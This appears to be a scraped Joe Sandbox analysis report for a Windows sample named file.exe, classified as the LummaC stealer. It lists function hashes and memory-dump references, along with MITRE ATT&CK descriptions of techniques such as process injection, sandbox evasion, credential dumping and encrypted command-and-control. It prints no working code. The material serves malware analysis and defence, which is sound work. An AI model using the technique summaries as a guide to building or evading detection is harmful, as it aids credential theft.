Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: E11100336051D50EC3199E3C8400565BFD30A93238F5D8399F4B4971D6F6238D8B8358

Function 00C7A060 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
Instruction ID: 7352bacf638ac8a9898ab9e7d1eff810ab4cc6645f7fb9c1ebffd56512741fba
Opcode Fuzzy Hash: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
Instruction Fuzzy Hash: 630171F570070197DB20AE6494C172FB2A97FC0705F19882CE91E57242EB76ED0D9696

Function 00C7B3DE Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5aa40866a0591da6effd41bdfa0a5607d6c523e9af3ecc24630727a4bf17697
Instruction ID: 0139c9c61c7919f55278a295d30411fc7ac6fc2cf3523effa375d5e61be06437
Opcode Fuzzy Hash: f5aa40866a0591da6effd41bdfa0a5607d6c523e9af3ecc24630727a4bf17697
Instruction Fuzzy Hash: 0BF0B4259886C345C31A8B3E8070331EBE18F77250F2C9569D4EA57392DB268D099714

Function 00C7B475 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec799597b517c99f5d84b17188860cbb779f9ecbfbf9c665bdeeff01c5a3934
Instruction ID: e05eb767bd4086a8361b414601c9bacf8c70744d526971869e1471244c4dde8f
Opcode Fuzzy Hash: 1ec799597b517c99f5d84b17188860cbb779f9ecbfbf9c665bdeeff01c5a3934
Instruction Fuzzy Hash: 92D0237C9044009BC24CDB10ED5173D72684F47296B042029D803F7343DD20D454874E

Function 00C5C274 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6de11e28f05b3641133aaed5b1c7fba0ef2497804bc3ca74d9f6afcca9cab83
Instruction ID: b06a7e1ae061a573f9dd3a9187610948b9ff427a80930bd0782c443e6952a120
Opcode Fuzzy Hash: b6de11e28f05b3641133aaed5b1c7fba0ef2497804bc3ca74d9f6afcca9cab83
Instruction Fuzzy Hash: 95D0122094A2995AC306CF78DCA5735B7B1EB03100F052549C182EB391C7D090168658

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
file.exe

Function 00C715F0 Relevance: 28.1, Strings: 22, Instructions: 608
COMMON

Function 00C86F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579
memoryCOMMON

Function 00C5E2A9 Relevance: 12.5, APIs: 1, Strings: 7, Instructions: 531
COMMON

Function 00C5A960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Function 00C5CE55 Relevance: 9.0, Strings: 7, Instructions: 275
COMMON

Function 00C733A0 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Function 00C7BFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461
COMMON

Function 00C86C40 Relevance: 6.5, Strings: 5, Instructions: 265
COMMON

Function 00C5C36E Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Function 00C7C6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614
COMMON

Function 00C7BFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456
COMMON

Function 00C597B0 Relevance: 5.4, Strings: 4, Instructions: 396
COMMON

Function 00C76170 Relevance: 5.3, Strings: 4, Instructions: 318
COMMON

Function 00C587F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON